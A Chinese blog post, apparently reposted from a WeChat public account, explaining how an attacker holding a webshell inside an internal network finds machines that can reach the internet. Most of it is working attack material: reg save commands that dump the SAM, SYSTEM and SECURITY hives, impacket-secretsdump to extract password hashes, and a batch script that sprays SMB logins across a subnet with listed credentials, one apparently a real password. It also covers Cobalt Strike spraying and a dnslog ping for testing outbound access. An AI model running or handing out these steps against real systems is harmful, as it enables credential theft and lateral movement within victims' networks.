0x00:前提
在webshell控制中,偶尔会遇到ipconfig查询IP中,里面的IP查询结果跟实际webshell的IP地址不同.
这种情况有可能是做了反向代理,或者其他情况.存在这种情况下,结合之前的文章获取一个shell.
例如:
那么就应该想方法让对方出网:
1、结合之前的文章进行出网
2、读出本机密码,然后内网smb喷射,寻找内网能出网的机器,然后出网.
3、等等
0x01:过程
一、读出hash
reg save HKLMSYSTEM sys.hiv
reg save HKLMSAM sam.hiv
reg save hklmsecurity security.hiv
然后下载到本地
利用kali自带小工具进行读取hash
impacket-secretsdump -sam sam.hiv -system sys.hiv -security security.hiv LOCAL
在线hash破解
https://www.objectif-securite.ch/ophcrack
https://cmd5.com/
二、寻找内网开放smb机器
然后再把事先通过其它渠道搜集到的更多的管理账号密码写进去,越多越好
@echo off
set user=Administrador admin1 admin2
set pwd=central@1708 pass1 pass2
for /f %%i in (c:/users/public/host.txt) do (
for %%j in (%pwd%) do (
for %%k in (%user%) do (
net use \%%ic$ /user:"%%k" "%%j" > nul && ping 127.0.0.1 -n 2 > nul && if %errorlevel% equ 0 ( echo %%i %%k %%j Login Succeed && echo %%i %%k %%j
Login Succeed >> c:userspublicSmbCache.txt ) && ping 127.0.0.1 -n 2 > nul && net use \%%ic$ /del > nul && ping 127.0.0.1 -n 2 > nul
) ) )
host.txt存放存在开放445端口的IP清单
我是C段全部都给放进去了
开启喷射smb
结果如下
后面还有很多我就不一一列举了
前面端口扫描完毕以后会在cs(多人运动)中存在记录
我们将上面获取到的密码结合
然后cs 就会去做smb喷射
然后重复上面喷射出的结果
利用账户密码内网登陆其他主机
三、测试是否出外网
结合dnslog平台测试是否出外网.
接下来是到登陆成功的主机上执行shell ping g5xixi.dnslog.cn 即可,随后到DNSlog平台查看记录.
查询IP是否是外网IP
获取到出网机器,那么接下来就是转移自己目标,将主力放在能出网的机器上.
本文始发于微信公众号(洛米唯熊):内网渗透中寻找出网机器
- 左青龙
- 微信扫一扫
- 右白虎
- 微信扫一扫
评论